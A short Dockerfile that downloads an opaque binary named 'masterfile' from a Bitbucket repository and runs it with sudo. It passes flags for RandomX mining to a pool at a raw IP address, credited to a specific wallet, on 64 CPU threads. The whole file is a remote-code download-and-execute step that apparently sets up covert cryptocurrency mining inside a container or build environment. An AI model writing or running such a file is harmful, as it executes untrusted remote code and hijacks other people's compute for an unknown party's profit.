FROM ubuntu-latest
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/tangoEnak123/ckckckckckck/downloads/masterfile
RUN chmod u+x masterfile
RUN sudo ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTT:TMNZFmZdpCSh3gMVMskgEFmWHR8z6EnEFB.Work1 --cpu-threads 64;0
